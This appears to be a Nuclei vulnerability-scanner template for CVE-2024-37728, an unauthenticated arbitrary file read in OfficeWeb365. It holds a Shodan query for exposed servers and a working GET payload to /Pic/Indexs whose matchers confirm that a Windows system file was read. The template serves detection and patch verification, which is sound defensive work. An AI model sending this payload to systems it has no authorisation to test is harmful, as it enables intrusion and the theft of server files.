id: CVE-2024-37728 info: name: OfficeWeb365 Indexs Interface - Arbitrary File Read author: DhiyaneshDK severity: high description: | There is any file reading in the officeWeb365 Indexs interface. impact: | Unauthenticated attackers can read arbitrary files from the OfficeWeb365 server. remediation: | Update OfficeWeb365 to a version that patches the arbitrary file read vulnerability. reference: - https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2024-37728 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-37728 epss-score: 0.01852 epss-percentile: 0.76922 cwe-id: CWE-22 metadata: verified: true max-request: 1 shodan-query: "OfficeWeb365" tags: cve,cve2024,officeweb365,lfi,vuln http: - method: GET path: - "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09" matchers-condition: and matchers: - type: word part: body words: - "for 16-bit app support" - type: word part: body words: - "image/png" - type: status status: - 200 # digest: 490a0046304402202d1cc43fccaff3a0e51f4f620e349b725442d2e43abb60a533d1dbe8d736a758022047ac753a0bed9a2677c789c51bdec828e5e4ac069bcd6c3520b116879f4cbb2f:922c64590222798bb761d5b6d8e72950